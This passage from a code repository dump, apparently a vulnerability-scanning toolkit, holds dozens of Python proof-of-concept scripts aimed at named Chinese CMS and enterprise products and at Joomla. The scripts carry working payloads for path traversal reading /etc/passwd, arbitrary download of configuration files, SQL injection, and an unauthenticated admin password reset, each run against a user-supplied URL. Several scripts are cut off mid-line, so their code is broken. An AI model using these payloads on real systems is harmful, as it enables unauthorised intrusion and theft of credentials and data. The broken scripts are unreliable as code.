20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"root:" in req.text and r"/bin/bash" in req.text:
27 | cprint("[+]存在iGenus邮箱系统login.php 参数Lang任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = igenus_login_Lang_fileread_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/inspur/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/inspur/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/iwms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/iwms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/iwms/iwms_bypass_js_delete.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: IWMS系统后台绕过&整站删除
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-085284
6 | author: Lucifer
7 | description: 禁用JS可越权查看文件目录,并人容易删除文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class iwms_bypass_js_delete_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/Admin/pages/fileManager.aspx?bp="
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"btnCreateFolder" in req.text:
27 | cprint("[+]存在IWMS系统后台绕过&整站删除漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = iwms_bypass_js_delete_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/jeecg/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/jeecg/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/jeecg/jeecg_pwd_reset.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: jeecg 重置admin密码
5 | referer: http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0121463.html
6 | author: Lucifer
7 | description: 未授权可访问初始化方法重置。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class jeecg_pwd_reset_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/loginController.do?goPwdInit"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"loginController.do?pwdInit" in req.text:
27 | cprint("[+]存在jeecg 重置admin密码漏洞...(高危)\tpayload: "+vulnurl+"\tadmin:123456", "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = jeecg_pwd_reset_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/jeecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/jeecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/jeecms/jeecms_fpath_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: jeecms download.jsp 参数fpath任意文件下载
5 | referer: http://www.wooyun.org/bugs/WooYun-2014-77960
6 | author: Lucifer
7 | description: 文件download.jsp中,参数fpath存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class jeecms_fpath_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在jeecms download.jsp 参数fpath任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = jeecms_fpath_filedownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/joomla/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/joomla/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/joomla/joomla_com_docman_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla组件com_docman本地文件包含
5 | referer: https://www.exploit-db.com/exploits/37620
6 | author: Lucifer
7 | description: joomla组件com_docman 文件com_docman/dl2.php中参数file被base64解码后可造成文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class joomla_com_docman_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA="
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = joomla_com_docman_lfi_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/joomla/joomla_index_list_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: joomla 3.7.0 core SQL注入
5 | referer: https://www.08sec.com/bobao/15167.html
6 | author: Lucifer
7 | description: joomla!3.7.0新引入的一个组件”com_fields“,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入.
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class joomla_index_list_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
27 | cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = joomla_index_list_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/jumboecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/jumboecms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/kingdee/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/kingdee/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/kingdee/kingdee_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金蝶办公系统任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0150077
6 | author: Lucifer
7 | description: 金蝶协同办公系统/oa/fileDownload.do文件参数path未校验存在任意文件下载漏洞,导致泄露敏感信息
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class kingdee_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if req.headers["Content-Type"] == "application/xml":
25 | cprint("[+]存在金蝶办公系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = kingdee_filedownload_BaseVerify(sys.argv[1])
33 | testVuln.run()
34 |
--------------------------------------------------------------------------------
/pocs/cms/kingdee/kingdee_logoImgServlet_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金蝶EAS任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-096179
6 | author: Lucifer
7 | description: 文件/portal/logoImgServlet中,参数type未过滤存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class kingdee_logoImgServlet_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"root:" in req.text and r"/bin/bash" in req.text:
27 | cprint("[+]存在金蝶EAS任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = kingdee_logoImgServlet_fileread_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/kxmail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/kxmail/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/lbcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/lbcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/libsys/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/libsys/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/libsys/libsys_ajax_asyn_link_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-067400
6 | author: Lucifer
7 | description: 漏洞影响3.5,4.0,5.0版本,漏洞文件位于ajax_asyn_link.php中,参数url可以传入"../"来读取PHP文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class libsys_ajax_asyn_link_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | for payload in [r"/zplug/ajax_asyn_link.php?url=../opac/search.php",
20 | r"/opac/zplug/ajax_asyn_link.php?url=../opac/search.php",
21 | r"/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php"]:
22 | vulnurl = self.url + payload
23 | try:
24 | req = requests.get(vulnurl, timeout=10, verify=False)
25 |
26 | if r"连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = libsys_ajax_asyn_link_fileread_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/libsys/libsys_ajax_asyn_link_old_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.old.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-059850
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_asyn_link.old.php中,参数url可以传入"../"来读取配置文件,并成功登陆到后台。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class libsys_ajax_asyn_link_old_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = libsys_ajax_asyn_link_old_fileread_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/libsys/libsys_ajax_get_file_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_get_file.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0116255
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_get_file.php中,参数filename可以传入"../"来读取配置文件,并成功登陆到后台。'''
8 | import sys
9 | import requests
10 | import warnings
11 | from termcolor import cprint
12 |
13 | class libsys_ajax_get_file_fileread_BaseVerify:
14 | def __init__(self, url):
15 | self.url = url
16 |
17 | def run(self):
18 | payload = "/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php"
19 | vulnurl = self.url + payload
20 | try:
21 | req = requests.get(vulnurl, timeout=10, verify=False)
22 |
23 | if r"连接超时", "cyan")
28 |
29 | if __name__ == "__main__":
30 | warnings.filterwarnings("ignore")
31 | testVuln = libsys_ajax_get_file_fileread_BaseVerify(sys.argv[1])
32 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/live800/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/live800/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/live800/live800_downlog_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: live800客服系统downlog任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0147322
6 | author: Lucifer
7 | description: live800客服系统downlog.jsp参数fileName未过滤导致任意文件下载,可下载数据库配置文件
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class live800_downlog_filedownload_BaseVerify():
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/live800/downlog.jsp?path=/&fileName=/etc/passwd"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"root:" in req.text and r"/bin/bash" in req.text:
25 | cprint("[+]存在live800客服系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = live800_downlog_filedownload_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/looyu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/looyu/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/looyu/looyu_down_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 乐语客服系统任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0150444
6 | author: Lucifer
7 | description: 乐语客服系统down.jsp文件file参数未过滤导致任意文件下载,可泄露敏感数据
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class looyu_down_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/live/down.jsp?file=../../../../../../../../../../../../../../../../etc/passwd"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"root:" in req.text and r"/bin/bash" in req.text:
25 | cprint("[+]存在乐语客服系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = looyu_down_filedownload_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/metinfo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/metinfo/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/ndstar/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ndstar/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/nitc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/nitc/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/nitc/nitc_index_language_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: NITC营销系统index.php SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2015-0152825
6 | author: Lucifer
7 | description: 文件/index.php中,参数language_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class nitc_index_language_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?language_id=1%20Or%20UpDateXml(1,CoNcAt(0x5c,Md5(1234)),1)%23--&is_protect=1&action=test"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
27 | cprint("[+]存在NITC营销系统index.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = nitc_index_language_id_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/nitc/nitc_suggestwordList_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: NITC营销系统suggestwordList.php SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2010-066683
6 | author: Lucifer
7 | description: 文件/suggestwordList.php中,参数language存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class nitc_suggestwordList_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/suggestwordList.php?searchWord=a&language=1%20Or%20UpDateXml(1,ConCat(0x5c,Md5(1234)),1)%23--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在NITC营销系统suggestwordList.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = nitc_suggestwordList_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/opensns/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/opensns/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/others/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/others/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/others/alkawebs_viewnews_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Designed by Alkawebs SQL Injection
5 | referer: unknow
6 | author: Lucifer
7 | description: viewnews.php文件id参数存在注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class alkawebs_viewnews_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/viewnews.php?id=-2%20UnIoN%20SeLeCt%201%2CMd5%281234%29%2C3%2C4%2C5%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在Designed by Alkawebs SQL Injection 漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = alkawebs_viewnews_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/anmai_grghjl_stuNo_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安脉grghjl.aspx 参数stuNo注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0102420
6 | author: Lucifer
7 | description: 文件/anmai/Edis/DiathesisAppraise/grghjl.aspx中,参数stuNo存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class anmai_grghjl_stuNo_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIon)>0--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在安脉grghjl.aspx 参数stuNo注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = anmai_grghjl_stuNo_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/cicro_DownLoad_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 时光动态网站平台(Cicro 3e WS) 任意文件下载
5 | referer: http://wooyun.org/bugs/wooyun-2013-035064
6 | author: Lucifer
7 | description: 文件/servlet/DownLoad,参数filePath未过滤可以下载网站配置文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class cicro_DownLoad_filedownload_BaseVerify():
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/servlet/DownLoad?filePath=WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if req.headers["Content-Type"] == "application/xml":
28 | cprint("[+]存在时光动态网站平台任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = cicro_DownLoad_filedownload_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/clib_kinweblistaction_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 五车图书管系统任意下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0128591
6 | author: Lucifer
7 | description: /5clib/kinweblistaction.action文件中,参数filePath未过滤存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class clib_kinweblistaction_download_BaseVerify():
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r"support" in req.text and r"MPEGVideo" in req.text:
28 | cprint("[+]存在五车图书管系统任意下载漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = clib_kinweblistaction_download_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/damall_selloffer_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: DaMall商城系统sql注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0115170
6 | author: Lucifer
7 | description: DaMall CMS文件selloffer.html?key参数存在搜索型SQL注入漏洞,可获取敏感信息。
8 | '''
9 | import sys
